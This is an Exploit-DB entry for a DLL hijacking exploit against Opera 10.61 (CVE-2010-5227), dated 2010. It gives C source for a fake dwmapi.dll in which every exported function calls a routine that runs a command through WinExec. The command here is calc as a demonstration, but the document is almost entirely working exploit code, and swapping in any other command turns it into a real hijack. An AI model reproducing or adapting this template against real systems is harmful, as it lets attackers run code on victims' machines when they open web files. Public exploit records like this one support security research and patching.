Opera 10.61 - 'dwmapi.dll' DLL Hijacking

Author: Nicolas Krassas
type: local
platform: windows
port: 
date_added: 2010-08-24 
date_updated: 2010-08-24 
verified: 1 
codes: OSVDB-67498;CVE-2010-5227 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comOpera_1061_en_Setup.exe

/*
Exploit Title: Opera DLL Hijacking Exploit ( dwmapi.dll )
Date: 24/08/2010
Author: Nicolas Krassas
http://twitter.com/Dinosn
Version: Opera 10.61
Tested on: Windows XP SP3
The code is based on the exploit from "TheLeader"
Vulnerable extensions: .htm .mht .mhtml .xht .xhtm .xhtl
dwmapi.dll is used in other applications too
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void  DwmDefWindowProc() { evil(); }
DLLIMPORT void  DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void  DwmEnableComposition() { evil(); }
DLLIMPORT void  DwmEnableMMCSS() { evil(); }
DLLIMPORT void  DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void  DwmGetColorizationColor() { evil(); }
DLLIMPORT void  DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void  DwmGetWindowAttribute() { evil(); }
DLLIMPORT void  DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void  DwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT void  DwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT void  DwmRegisterThumbnail() { evil(); }
DLLIMPORT void  DwmSetDxFrameDuration() { evil(); }
DLLIMPORT void  DwmSetPresentParameters() { evil(); }
DLLIMPORT void  DwmSetWindowAttribute() { evil(); }
DLLIMPORT void  DwmUnregisterThumbnail() { evil(); }
DLLIMPORT void  DwmUpdateThumbnailProperties() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}